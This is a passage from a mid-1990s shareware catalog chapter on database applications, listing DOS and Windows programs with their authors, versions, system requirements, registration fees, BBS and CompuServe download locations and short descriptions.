Holler), 317-782-9903 + Version: 2.31 (01-27-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Hard disk. + Registration fee: $29.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, BBS, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 6); disks of other + shareware. + Look for: CREST231.ZIP on BBSs (call 317-784-2147 to download it + at no charge); CREST.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 6 (or contact userID 73567,1547 for assistance). + SWREG#: 1581 + Download size: 328k (about 25 minutes with a 2400 baud modem) + Description: + Database program to keep track of expenses and time spent while + restoring vintage cars. It will also maintain a database of + parts dealers, car shows, swap meets, etc. Includes an + appointment calendar and a pop-up calculator. View and print + reports and mailing labels. Easy to learn and use. Context + sensitive online help. + + Chapter 5, "Database applications" 221 + + + + Product: Computer System Manager + Author: RMH Computer Services (Richard Holler), 317-782-9903 + Version: 1.41 (02-19-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Hard disk. + Strongly recommended: Hercules monitor; Epson printer. + Registration fee: $29.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, BBS, CompuServe, + mail support; 3-month return policy; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades. + Look for: CSM141.ZIP on BBSs (call 317-784-2147 to download it at + no charge); CSM.ZIP on CompuServe in CIS:PCAPP forum LIBrary 7 + (or contact userID 73567,1547 for assistance). + SWREG#: 1371 + Download size: 430k (about 32 minutes with a 2400 baud modem) + Description: + Comprehensive computer system equipment tracking. Ideal for + home users, small business, and corporate system managers. + Information can be tracked to individual computer systems + noting model & serial numbers, install dates, warranty + expiration, etc. Set up an inventory for unassigned equipment + and spare parts. Free form report writer. Full customization of + screen colors, file indexes, printer, and validation tables + including Vendor, Hardware and Software types. Context + sensitive online help. + + + Product: DATABASE BROWSER + Author: Redei Enterprises, 310-832-6984 + Version: 1.21 (04-15-95) + Needs: IBM 80386, Windows 3.1 or better. 8000k RAM; VGA monitor; + Hard disk; VBRUN300.DLL. + Strongly recommended: SVGA monitor; Mouse; Network (LAN); XMS + memory; math coprocessor. + Registration fee: $49.50 (add $5.50 for shipping to U.S. + addresses) (add $5.50 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + SWREG#: 5206 + PsL#: 14006 + Download size: 1734k (about 129 minutes with a 2400 baud modem) + Description: + An easy to use tool with full edit, query, sorting and printing + capabilities. It supports MS Access 1.1 & 2.0 (.MDB), dBase + III&IV, FoxPro 2.0&2.5 (.DBF), Paradox (.DB) and Btrieve + (.DDF&.DAT). Records are displayed in a scrollable grid in + which columns may be moved, resized. It provides QBE, zooming. + Masking for numeric fields. LAN support. Calculated columns and + totals. Reports to printer, to text file and to clipboard. + Remote usage from other Windows applications. + + Chapter 5, "Database applications" 222 + + + + Product: Docudex Document Imaging + Document imaging with powerful query system. See full + description on page 196. + + Product: Docuthek Document Imaging + Document imaging with powerful query system. See full + description on page 196. + + Product: Easy Base + Author: Easy Software (John Turnbull), +44(0)1625-614669 + Version: 10.3 (12-14-95) + Needs: IBM PC, DOS 5.0 or better. 510k RAM; Hard disk. + Registration fee: $49.00 + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of unlimited CompuServe, mail support; all ASP-wide + offers (see page 6). + Look for: availability unknown on BBSs; EB.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 3 (or contact userID 100410,717 for + assistance). + SWREG#: 3043 + PsL#: 11489 + Download size: 984k (about 73 minutes with a 2400 baud modem) + Description: + The first true Rapid Application Development (RAD) system + available on shareware. You can create sophisticated menu + driven data management applications in record time. If you want + to get programming - Get Easy Base. V10 includes automatic + locking routines for multi user network applications. + + + Product: Infothek Information Manager + Information Manager, PIM, Labels Barcodes. See full + description on page 139. + + Product: MCBase + Relational music collection database system. See full + description on page 520. + + Product: The MetaKit Library [***] + C++ classes for persistent structured data. See full + description on page 387. + + Product: Office Supplies Tracker + Office supplies ordering/inventory system. See full + description on page 266. + + Product: Paper Route Ledger + Computer bookkeeping for newspaper carriers. See full + description on page 256. + + Chapter 5, "Database applications" 223 + + + + Product: Qbrws + Author: Ariadne-Beratung + Version: 2.12 (01-01-96) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; QBRWS.ZIP on CompuServe + in CIS:MSACCESS forum LIBrary 6 (or contact userID 100322,71 + for assistance). + SWREG#: 7062 + PsL#: 14184 + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Lists (un)used tables and queries in your MS-Access Database. + So you can do some housekeeping even in large DB Simply export + the report rptQbrws into your DB and open it there. rptQbrws + scans your forms,reports & macros for referenced tables and + queries recursively. The registered version optionally renames + unused tables/qry: Now test your application: if it runs, you + can delete the renamed objects. + + + Product: RexxBase + The dBase Database For Rexx. See full description on page 387. + + Product: SC-Scripter + SQL server (MS/Sybase) DB script generator. See full + description on page 242. + + Product: Schooner + Author: Jonathan Cook, 209-299-4950 + Version: 2.50 GUI (03-14-95) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; EGA monitor; Hard + disk. + Strongly recommended: VGA monitor; HP DeskJet printer; HP + LaserJet printer; Mouse; Epson printer. + Registration fee: $39.95 + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, fax, CompuServe, mail support; royalty-free runtime + license; bonus utilities; bonus data; bonus graphics. + Look for: SCH250.ZIP on BBSs; SCHOON.ZIP on CompuServe in CIS:IBM + forum LIBrary 0 (or contact userID 72672,2502 for assistance). + Download size: 490k (about 37 minutes with a 2400 baud modem) + Description: + A complete software application development system that allows + you to build powerful DOS graphical user interface (GUI) + software applications. dBASE III Plus file compatible and + Clipper '87 compiler compatible code. + + Chapter 5, "Database applications" 224 + + + + Product: Search-N-Store + Author: Shawn Anderson SoftWare, 309-787-4967-(X227) + Version: 3.4 (06-14-94) + Needs: IBM AT (80286), DOS 2.11 or better. 350k RAM. + Strongly recommended: Hard disk; Mouse; Network (LAN). Disk + cache. + Registration fee: $50.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited fax, CompuServe, mail + support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + Download size: 280k (about 21 minutes with a 2400 baud modem) + Description: + A network ready, multi-user or stand alone database with lots + of search and print options. Uses text style graphics. A + database utility is included. + + + Product: SoundMasterDb + Audio library cataloging program. See full description on + page 554. + + Product: WordLink(TM) + Drag & drop data from database to MSWord docs. See full + description on page 207. + + + 5.2 Flat-file database managers + + See also: Database applications, Mailing list systems. + + Product: Book Librarian + Book cataloging program. See full description on page 444. + + Product: FILE EXPRESS + Author: Expressware Corporation, 206-788-0932 + Version: 5.1 (12-10-93) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; CGA monitor; Dual + 720k floppy drives. + Strongly recommended: Hard disk. + Registration fee: $99.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $23.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; 2-month return policy; bonus + + Chapter 5, "Database applications" 225 + + + + templates; discounts on upgrades. 1-month free upgrading + allowed. + Look for: FE51*.ZIP on BBSs (multiple files) (call 206-788-4008 + to download it at no charge); FE51*.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 3 (multiple files) (or contact userID + 75226,2020 for assistance). + Download size: 1300k (about 97 minutes with a 2400 baud modem) + Description: + An easy to use flat file database manager with relational + lookup and update capabilities. Handles over 2 billion records + per database, 200 fields per record, 1000 characters per field + and 4000 characters per record. Includes extensive searching, + reporting, label printing, importing, exporting and duplicate + searching. Database formats can be changed at any time without + losing data. Formula handler includes over 60 string and + numeric functions. Includes an auto-dialer. Supports 300+ + printers. + + + Product: HOLD-ANYTHING! + Keeps track of any kind of data very easily! See full + description on page 229. + + Product: Household Register + Home/office inventory program. See full description on + page 519. + + Product: Layout + Office layout and equipment inventory. See full description on + page 273. + + Product: Little Lists + Author: R.K. West Consulting (Rosemary K. West) + Version: 3.2 (07-28-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $15.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + discounts on other products; discounts on upgrades. + Look for: LLIST32.ZIP on BBSs; LITTLE.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10938 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Database program for users who want to keep things simple. + Create exactly the list you want, without prior knowledge of + programming or database systems. Add, view, change records, + browse through the list, print reports & labels including only + the fields you want, sort the records any way you like, perform + + Chapter 5, "Database applications" 226 + + + + simple math, add & change fields, import/export ASCII and DBF + files. + + + Product: MicroPlayerCD(tm) + Play audio CDs on your computer's CDROM drive. See full + description on page 72. + + Product: NAMEBASE + Name/address/notes database w/mouse support. See full + description on page 290. + + Product: q&dBase for Windows + Author: Q&D Software Development (Dave Verschleiser), + 201-635-1824 + Version: 2.0a (10-23-94) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; + VBRUN300.DLL. + Strongly recommended: Mouse. + Registration fee: $27.50 (add $3.95 for shipping to U.S. + addresses) (add $3.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, CompuServe support; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: QDBW.ZIP on BBSs (call 201-886-8048 to download it at + no charge); QDBW.ZIP on CompuServe in CIS:PCAPP forum LIBrary 7 + (or contact userID 76336,3271 for assistance). + SWREG#: 3598 + PsL#: 11656 + Download size: 660k (about 49 minutes with a 2400 baud modem) + Description: + The only shareware program that allows you to create and define + your own databases, design your own data entry forms, create + and store report queries, design report layouts, and store all + data in MS-Access 2.0 format for easy portability. Includes + print preview feature and on-line context sensitive Windows + help system. + + + Product: Video Librarian + Video library cataloging program. See full description on + page 549. + + + 5.3 Mailing list systems + + See also: Database applications, Flat-file database managers; + Utilities, Printer utilities, Envelope addressers. + + Product: APT Mailing Assistant + Print envelopes/labels/bulk mail with POSTNET. See full + description on page 80. + + Chapter 5, "Database applications" 227 + + + + Product: Book-It + Membership and activity booking system. See full description + on page 302. + + Product: FILE EXPRESS + Powerful, easy DBMS with relational features. See full + description on page 224. + + Product: FundRaiser Basic + Donor management software for nonprofits. See full description + on page 298. + + Product: Infothek Information Manager + Information Manager, PIM, Labels Barcodes. See full + description on page 139. + + Product: Little Lists + Easy-to-use database system. See full description on page 225. + + Product: NAMEBASE + Name/address/notes database w/mouse support. See full + description on page 290. + + Product: Phone Book Maker + Author: Ronnie Tsedek + Version: 1.7 (06-15-96) + Needs: IBM 80386, Windows 3.1 or better. 8000k RAM; Program can + run safely on a system with no hard disk and only one floppy + disk drive; VGA monitor; Hard disk; Mouse; XMS memory. + Strongly recommended: HP DeskJet printer; HP LaserJet printer. + Registration fee: $35.00 + Registration benefits: Full program functionality; 6 months of + CompuServe, mail support. + Look for: availability unknown on BBSs; PHMKR*.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 10 (multiple files) (or contact + userID 103612,3256 for assistance). + Download size: 2500k (about 186 minutes with a 2400 baud modem) + Description: + Makes phone books in 3 sizes: Pocket, 1/2 Letter and Letter + size. 30 useful fields per record. Each record can be assigned + to 3 groups. Powerful index, filter and search. Prints standard + envelopes, labels, rotery cards and phone book lists with + selective records and fields. Includes diary and calendar. + Import and export in variety of formats available. Large note + field. Makes Merge Data Files to merge with your document in + your word processor. Virtually unlimited records per file. + + Chapter 5, "Database applications" 228 + + + + Product: PostCardMaster + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 4.20 (09-01-94) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor. IBM Graphics printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + all ASP-wide offers (see page 6); disks of other shareware; + discounts on other products. Lifetime free upgrading allowed. + 99 free update disk(s) sent out. + Look for: PCM420.ZIP on BBSs (call 317-784-2147 to download it at + no charge); PCMSTR.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 9 (or contact userID 70272,3317 for assistance). + SWREG#: 80 + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Designed to help uUsers compose post cards and maintain + addresses. The address feature has entries for name, + salutation, code, 3 line address and a line for zipcode, + telephone number, and a remarks line. Printouts include + listings of the addresses, address labels, 3X5 cards, 8 types/ + sizes of post cards or Rolodex cards and response cards that + pre-print a response from the addressee to mail to the + originator. Post cards cost 1/3 less than a letter and in some + cases are equally as good ie meetings. + + + Product: PrintEnvelope + Complete mail addressing system for Windows. See full + description on page 82. + + Product: PSA Cards for Windows 3.1 + An easy to use personal information manager. See full + description on page 141. + + Product: PSA Cards for Windows 95/NT + An easy to use personal information manager. See full + description on page 142. + + Chapter 5, "Database applications" 229 + + + + Product: Public Address + Author: Paradise Programming (Chris M. Davies), 206-866-3781 + Version: 3.1 (10-05-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk; HP LaserJet printer; Epson + printer. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; all ASP-wide offers (see page 6); disks of other + shareware; discounts on upgrades. 3 free update disk(s) sent + out. + Look for: PA310.ZIP on BBSs; PUBADD.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 9 (or contact userID 70322,231 for + assistance). + Download size: 154k (about twelve minutes with a 2400 baud modem) + Description: + Full featured address manager. Prints pre-defined labels and + enevlopes for dot-matrix or laser printers. Searches on most + feilds. Unlimited records, and groups. Supports international + addresses and character set. Dynamic menus allow you to change + the menus to your native language. No more waisted laser labels + because you can start printing from anywhere on a sheet. + Supports up to six return address for envelopes. + + + Product: ZIPKEY + TSR Zip Code & area code keyboard enhancement. See full + description on page 245. + + + 5.4 Freeform/text database managers + + Product: BusinessCards for Windows + Free form database for Windows. See full description on + page 134. + + Chapter 5, "Database applications" 230 + + + + Product: HOLD-ANYTHING! + Author: Elk Creek Software (Michael J. Paulick) + Version: 1.1 (02-21-93) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Modem. + Registration fee: $19.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of CompuServe, mail support; disks of other shareware. + Look for: HOLD11.ZIP on BBSs; HOLD11.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 7 (or contact userID 70640,1614 for + assistance). + Download size: 90k (about seven minutes with a 2400 baud modem) + Description: + An extremely easy to use program which keeps track of any kind + of data! No database setup required - just start entering your + data. A great multi-purpose database program with a slick + interface. A mouse is fully supported. Records are quickly + located by typing the first few letters of an item's name, or + by picking from a list. Holds multiple categories of data. + You'll think of new uses for it all the time, e.g. notes, time + tracking, hobby collections, log book, address book, inventory, + etc. + + + Product: PageFocus + A productivity program for everyday use. See full description + on page 483. + + Product: Recon + Full management of CompuServe message files. See full + description on page 359. + + + 5.5 Database utilities + + Product: DataBrowser + Flexible database searching/viewing utility. See full + description on page 233. + + Chapter 5, "Database applications" 231 + + + + Product: EMERI + Author: Rhode Island Soft Systems, Inc., 401-767-3106 + Version: 1.3 (05-01-93) + Needs: IBM PC, Windows 3.0 or better. 128k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $16.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 12 months of unlimited phone, fax, BBS, + CompuServe, GEnie, newsletter, mail support; 1-month return + policy; all ASP-wide offers (see page 6); discounts on other + products. + Look for: EMERI13.ZIP on BBSs (call 401-767-3931 to download it + at no charge); EMERI1.ZIP on CompuServe in CIS:RISS forum + LIBrary 5 (or contact userID 72662,463 for assistance). + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + The CardFile program that comes free with Microsoft Windows is + a truly handy little "Applet" for managing phone numbers and + addresses, etc. Unfortunately, for those of us who bounce in + and out of Windows, Murphy's Law dictates that we'll be staring + at a DOS prompt when we need quick access to our Cardfiles! + This DOS-based program browses Windows Cardfiles. Optimized + for quick, easy "hits" on the card you're looking for. Offers + partially qualified searches, and more! + + + Product: Little Lists + Easy-to-use database system. See full description on page 225. + + Product: PCFDial + Powerful 7k TSR voice/fax screen autodialer. See full + description on page 127. + + Product: PopDBF + 4k TSR for "instant access to X-Base files" See full + description on page 234. + + Product: q&dBase for Windows + Database creation and maintenance program. See full + description on page 226. + + Product: Recap + Fix capitalization in dBase-compatible files. See full + description on page 235. + + Product: SC-Scripter + SQL server (MS/Sybase) DB script generator. See full + description on page 242. + + Product: SuperDIR + DIR util, incl/excl masks, DB output, src av. See full + description on page 23. + + Chapter 5, "Database applications" 232 + + + + Product: ZIPKEY + TSR Zip Code & area code keyboard enhancement. See full + description on page 245. + + 5.5.1 File format translators + + See also: Utilities, File utilities, File sorting & conversion. + + Product: AsciiConvert + ASCII File Converter. See full description on page 44. + + Product: Extract It + Report data extractor. See full description on page 45. + + Product: WinBrowse + Author: Q&D Software Development (Dave Verschleiser), + 201-635-1824 + Version: 1.6a (04-17-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Registration fee: $22.50 (add $3.95 for shipping to U.S. + addresses) (add $4.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, CompuServe, mail support; all ASP-wide offers + (see page 6). Lifetime free upgrading allowed. + Look for: WINBRS16.ZIP on BBSs; WINBRS.ZIP on CompuServe in + CIS:WINAPD forum LIBrary 1 (or contact userID 76336,3271 for + assistance). + SWREG#: 4307 + PsL#: 11861 + Download size: 1140k (about 85 minutes with a 2400 baud modem) + Description: + A multiple PC database utility which allows browsing, editing, + and reporting of data using any of several different popular PC + database formats. dBase III+, dBase IV, FoxPro 2.0, 2.5, 2.6, + Paradox 3.x, 4.x, and Access 2.0 formats supported. Even lets + you transfer data from one format to another! Create sorts and + filters on any or all fields using any supported format. + + + 5.6 Software tools & add-ins + + See also: Computer programming, Languages; Computer + programming, Software tools & add-ins. + + Chapter 5, "Database applications" 233 + + + + 5.6.1 For multiple programs + + Product: DataBrowser + Author: Software Avenue, Inc. (Gregory Lee), 602-813-0876 + Version: 1.0 (10-03-95) + Needs: IBM PC, Windows 3.0 or better. 2000k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $49.95 (add $4.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited CompuServe, mail + support; 3-month return policy; all ASP-wide offers (see + page 6); disks of other shareware. 3-month free upgrading + allowed. + Look for: DBROWSER.ZIP on BBSs; DBROWSER.ZIP on CompuServe in + CIS:BUSINESS forum LIBrary 0 (or contact userID 76455,3236 for + assistance); DBROWSER.ZIP on GEnie in 0 forum LIBrary 0. + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + A flexible database utility that allows you to view and search + any DBase, Paradox, and Text database file. For each file + selected you can identify which fields you want to view, search + on any field, and print out selected records. Remembers your + setup for different database files and will adjust accordingly + as you switch between different databases. Context sensitive + help and an inuitive user interface make this program easy to + install and use. + + + Product: File-Ex + Adds file management functions to file dlgs. See full + description on page 169. + + Product: PopDBF + Author: Lighthouse Software, Inc., 309-673-9886 + Version: 4.05 (07-29-92) + Needs: IBM PC, DOS 3.0 or better. 4k RAM. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of phone, fax, CompuServe, mail + support; 2-month limited return policy. + Look for: POPDBF??.ZIP on BBSs (call 414-789-4210 to download it + at no charge); POPDBF.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 3 (or contact userID 76665,736 for assistance). + Download size: 130k (about ten minutes with a 2400 baud modem) + Description: + A 4K TSR that provides "Instant Access to X-Base Files". Here + are just a few of its features: + * Easily select ANY database, any drive + * Append, browse, delete, and edit records + * Delete, pack and zap databases + + Chapter 5, "Database applications" 234 + + + + * Lightning fast search of entire record or selected + field(s) + * View structure + * Print structure or records (browse or edit format) to a + printer or file + * View index expressions (.IDX, .NDX, .NTX) + * Network Compatible + * Context sensitive help + + + Product: QUIK-INSTALL + 7k application install program! Many features. See full + description on page 413. + + Product: Recap + Author: R.K. West Consulting (Rosemary K. West) + Version: 5.1 (08-14-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. dBase-compatible data file. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: RECAP51.ZIP on BBSs; RECAP.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 145k (about eleven minutes with a 2400 baud modem) + Description: + It can be very frustrating to find that some of your database + records have been entered in all caps when you didn't want them + that way, or that some have not been entered in all caps when + you did want them that way! Goes through any dBase-III + compatible database file and make the desired adjustments. Can + save you from hours of re-entering data. + + + Product: SeekWell Universal Query + Universal database query, labels, bar codes. See full + description on page 142. + + Product: WinBrowse + Multiple PC database utility program. See full description on + page 233. + + Product: Zip Express + Zip Code look up and auto-paster. See full description on + page 318. + + 5.6.2 For dBASE + + Product: DATABASE BROWSER + Browser with editing, query, sorting and more. See full + description on page 221. + + Chapter 5, "Database applications" 235 + + + + Product: DBKIT + Author: P. C. Softsmith (Vic Williams), 604-433-5189 + Version: 2.5 (03-01-94) + Needs: IBM PC, DOS 3.1 or better. 521k RAM; Hard disk. + Registration fee: $0.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: DB**.ZIP on BBSs (multiple files). + Download size: 800k (about 60 minutes with a 2400 baud modem) + Description: + Provides a wide range of maintenance, development, monitoring, + and management tasks without an interpreter. Command line + orientation. Includes teleshare gather remote & local file + management & remote support. + + + Product: dVERSION + Author: C & R Business Systems Ltd. (Dennis Allen), 616-281-3333 + Version: 2.0 (09-05-93) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM. + Registration fee: $55.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; DVER.ZIP on CompuServe in + CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 67k (about five minutes with a 2400 baud modem) + Description: + Conditionally translates xBASE code. Lets the programmer have + many versions of an application in one set of source code. + + + Product: WordLink(TM) + Drag & drop data from database to MSWord docs. See full + description on page 207. + + Chapter 5, "Database applications" 236 + + + + Product: Workbase + Author: R.K. West Consulting (Rosemary K. West) + Version: 4.31 (01-01-96) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. Some knowledge of Xbase + commands and functions. + Registration fee: $29.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + discounts on upgrades. + Look for: WORK431.ZIP on BBSs; WORK.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + SWREG#: 9175 + PsL#: 10251 + Download size: 235k (about 18 minutes with a 2400 baud modem) + Awards & nominations: 1990 winner, Public Brand Software + contests for useful programs. + Description: + Xbase developers: this is an interactive environment for over + 200 Xbase commands and functions, including some that may be + new to you. Create, append, edit, browse, restore from and save + to MEM files, display memory, display structure, modify + structure - many other commands for development, + troubleshooting and support. Includes rudimentary PRG + interpreter. If your applications use dBase-compatible files, + you'll love this handy utility. Unlike other "dot prompt" + programs, this one works! + + + 5.6.2.1 dBASE III specific + + Product: dPerfect Merge + Converts xBase to WordPerfect secondary file. See full + description on page 45. + + Product: RexxBase + The dBase Database For Rexx. See full description on page 387. + + Chapter 5, "Database applications" 237 + + + + 5.6.3 For FoxPro/FoxBASE+ + + Product: Data Wire Four + Author: C & R Business Systems Ltd. (Dennis Allen), 616-281-3333 + Version: 1.4.1 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $25.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; DW4.ZIP on CompuServe in + CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 17k (about two minutes with a 2400 baud modem) + Description: + A Foxpro procedure designed to allow an application to verify + databases quickly and easily. In essense, the programmer + executes DW4, generating a data dictionary program. It has a + 'picture' of all databases in the current directory. When + executed, it verifies that all specified databases exist and + have the correct field layouts. Structural indices are also + verified. The generated program can execute alone or within a + Foxpro application. + + + Product: DATABASE BROWSER + Browser with editing, query, sorting and more. See full + description on page 221. + + Product: DBKIT + Xbase programming & maintenance. See full description on + page 235. + + Chapter 5, "Database applications" 238 + + + + Product: dMAIL4 + Author: C & R Business Systems Ltd. (Dennis Allen), 616-281-3333 + Version: 4.0.1 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $75.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; DMAIL4.ZIP on CompuServe + in CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 434k (about 32 minutes with a 2400 baud modem) + Description: + A Foxpro application designed to record and track a simple + mailing list database. Among its features is the ability to + run in a network environment. Can access customer records by a + variety of indices. Records can be imported and exported to a + variety of file formats. + + + Product: dPerfect Merge + Converts xBase to WordPerfect secondary file. See full + description on page 45. + + Product: Hard Wire Four + Author: C & R Business Systems Ltd. (Dennis Allen), 616-281-3333 + Version: 2.8.1 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $45.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; discounts on other products. + Look for: availability unknown on BBSs; HW4.ZIP on CompuServe in + CIS:FOXUSE forum LIBrary 5 (or contact userID 73304,1222 for + assistance). + Download size: 77k (about six minutes with a 2400 baud modem) + Description: + A set of procedures to give the programmer a means to create an + application quickly and easily. In essense, the programmer + creates a data dictionary. This database defines all + parameters to create and maintain the files with an + application. An edit procedure, often called the 'little black + box', then can be used to perform the actual file maintenance. + + Chapter 5, "Database applications" 239 + + + + Product: SAC DATABASE + Author: C & R Business Systems Ltd. (Dennis Allen), 616-281-3333 + Version: 2.7.2 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + Foxpro Runtime Unit. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $75.00 (add $15.00 for shipping to U.S. + addresses) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + royalty-free source code; bonus graphics; discounts on other + products. + Look for: availability unknown on BBSs; SAC.ZIP on CompuServe in + CIS:ASTROFORUM forum LIBrary 5 (or contact userID 73304,1222 + for assistance). + Download size: 865k (about 64 minutes with a 2400 baud modem) + Description: + A Foxpro application designed to record and track the Saguaro + Astronomy Club database. This database includes deep-sky and + double star objects. Among its features is its ability to + access records by a variety of indices (including notes). It + will also let you keep user logs on various objects. + + + Product: Shell + Author: C & R Business Systems Ltd. (Dennis Allen), 616-281-3333 + Version: 1.2.3 (07-20-95) + Needs: IBM 80386, DOS 3.3 or better. 512k RAM; Hard disk. + 